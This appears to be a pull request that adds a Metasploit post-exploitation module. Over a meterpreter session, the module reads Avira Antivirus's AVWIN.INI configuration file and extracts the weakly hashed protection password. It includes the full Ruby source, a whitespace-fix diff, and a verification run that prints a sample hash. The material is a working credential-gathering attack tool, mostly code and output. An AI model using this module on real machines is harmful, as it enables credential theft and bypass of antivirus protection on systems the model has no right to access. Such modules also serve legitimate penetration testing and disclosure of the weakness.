### PR TITLE
Add Windows Gather Avira Password Extraction

### DIFF
--- a/modules/post/windows/gather/credentials/avira_password.rb
+++ b/modules/post/windows/gather/credentials/avira_password.rb
@@ -10,7 +10,7 @@ require 'rex/parser/ini'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
-  
+
   def initialize(info={})
     super( update_info( info,
         'Name'          => 'Windows Gather Avira Password Extraction',
@@ -46,15 +46,15 @@ class MetasploitModule < Msf::Post
     ini = Rex::Parser::Ini.from_s(parse)
 
     if ini == {}
-	print_error("Unable to parse file")
-	return
+    print_error("Unable to parse file")
+    return
     end
 
-      	print_status("Processing configuration file...")
-      	passwd = ini["COMMON"]['Password']
-      	passwd = passwd.delete "\""
-      	print_good("MD5(Unicode) hash found: #{passwd}")
-	print_good("Info: Password length is limited to 20 characters.")
+        print_status("Processing configuration file...")
+        passwd = ini["COMMON"]['Password']
+        passwd = passwd.delete "\""
+        print_good("MD5(Unicode) hash found: #{passwd}")
+        print_good("Info: Password length is limited to 20 characters.")
   end
 
 end

--- a/modules/post/windows/gather/credentials/avira_password.rb
+++ b/modules/post/windows/gather/credentials/avira_password.rb
@@ -1,0 +1,60 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'rex/parser/ini'
+
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Gather Avira Password Extraction',
+        'Description'   => %q{
+          This module extracts the weakly hashed password
+          which is used to protect a Avira Antivirus (<= 15.0.17.273) installation.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Robert Kugler / robertchrk'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+  end
+
+  def run
+    print_status("Checking default location...")
+    check_programdata("C:\\ProgramData\\Avira\\Antivirus\\CONFIG\\AVWIN.INI")
+  end
+
+  def check_programdata(path)
+    begin
+      client.fs.file.stat(path)
+      print_status("Found file at #{path}")
+      get_ini(path)
+    rescue
+      print_status("#{path} not found ....")
+    end
+  end
+
+  def get_ini(filename)
+    config = client.fs.file.new(filename, 'r')
+    parse = Rex::Text.to_ascii(config.read)
+    ini = Rex::Parser::Ini.from_s(parse)
+
+    if ini == {}
+	print_error("Unable to parse file")
+	return
+    end
+
+      	print_status("Processing configuration file...")
+      	passwd = ini["COMMON"]['Password']
+      	passwd = passwd.delete "\""
+      	print_good("MD5(Unicode) hash found: #{passwd}")
+	print_good("Info: Password length is limited to 20 characters.")
+  end
+
+end


### PR DESCRIPTION
The password protection feature of Avira Antivirus (recent version) that allows a user to lock access to his/her Avira installation uses a weak hash function and stores the file containing the hash readable for authenticated users.
## Verification

```
use post/windows/gather/credentials/avira_password
set session x

[*] Checking default location...
[*] Found file at C:\ProgramData\Avira\Antivirus\CONFIG\AVWIN.INI
[*] Processing configuration file...
[+] MD5(Unicode) hash found: C31AC605793F580B386C0FB53F1B9775
[+] Info: Password length is limited to 20 characters.
[*] Post module execution completed
```
